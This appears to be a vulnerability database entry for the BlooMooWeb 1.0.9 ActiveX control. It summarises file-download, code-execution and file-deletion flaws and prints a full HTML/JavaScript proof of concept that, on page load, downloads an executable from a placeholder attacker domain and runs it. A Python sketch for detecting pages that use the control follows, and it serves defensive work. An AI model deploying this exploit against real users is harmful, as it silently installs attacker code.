BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities

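Vulnerability ID: 1056022
Vulnerability type:
Published: 2006-10-31
Updated: 2006-10-31
CVE ID: N/A
CNNVD-ID: N/A
Platform: Windows
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/28884
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit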
source: http://www.securityfocus.com/bid/20827/info

BlooMooWeb ActiveX control is prone to multiple vulnerabilities, including:

- an arbitrary file-download issue
- an arbitrary code-execution issue
- an arbitrary file-deletion issue. 

An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files.

<html>
<head>
<script language="JavaScript">

var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";

function spawn2()
{
        aa1=o2obj.GetInstallationDir(null);
        aa2="BlooMooWEB.exe";
        o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
        if(msgCode == 'DOWNLOAD_COMPLETE' )
        {
                o2obj.BW_LaunchGame("treleferekuku");
        }
}

</script>
</head>

<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002">
</object>
</body>
</html>
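
A detection sketch for the pattern in the listing above, added here as an example and not part of the original advisory or exploit: it flags HTML that embeds the control's CLSID and calls the methods the proof of concept uses. The function name scan_html, the sample markup and its placeholder names are assumptions made for illustration.

```python
import re

# CLSID from the <object> tag in the proof of concept on this page.
BLOOMOO_CLSID = "22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
# Control methods the proof of concept calls; no other method names appear on the page.
POC_METHODS = ("GetInstallationDir", "BW_DownloadFile", "BW_LaunchGame")

# "[^>]*" keeps matching across newlines, so an <object> tag whose closing ">" is
# missing still yields its attributes.
OBJECT_RE = re.compile(r"<object\b([^>]*)", re.I)
CLASSID_RE = re.compile(r"\bclassid\s*=\s*[\"']?\s*clsid:\s*\{?([0-9a-f-]{36})", re.I)
ID_RE = re.compile(r"\bid\s*=\s*[\"']?([\w$]+)", re.I)


def scan_html(html):
    """Report use of the BlooMooWeb control in one HTML document."""
    object_ids = []
    instantiated = False
    for tag in OBJECT_RE.finditer(html):
        attrs = tag.group(1)
        clsid = CLASSID_RE.search(attrs)
        if clsid and clsid.group(1).upper() == BLOOMOO_CLSID:
            instantiated = True
            ident = ID_RE.search(attrs)
            if ident:
                object_ids.append(ident.group(1))
    # Method calls made through the ids of matching <object> tags.
    calls = [(obj, method) for obj in object_ids for method in POC_METHODS
             if re.search(r"\b%s\s*\.\s*%s\s*\(" % (re.escape(obj), method), html)]
    return {
        "instantiated": instantiated,
        "object_ids": object_ids,
        "calls": calls,
        # Weaker signal: the CLSID appears somewhere (e.g. a tag built from script).
        "clsid_mentioned": BLOOMOO_CLSID.lower() in html.lower(),
    }


# Constructed sample (not captured traffic): the control is embedded with an
# unterminated <object> tag and driven from script; variables u and p are placeholders.
SAMPLE = """<script>function f(){ ctl.BW_DownloadFile(u, p, "cb"); ctl.BW_LaunchGame("x"); }</script>
<object ID="ctl" WIDTH=0 HEIGHT=0
    classid="clsid:22e9efba-114c-4da0-ae72-d8f2c7138002"
</object>"""

if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

The scan only follows ids declared on matching <object> tags; a hit on clsid_mentioned alone means the page references the control without a tag the scan could tie to a call.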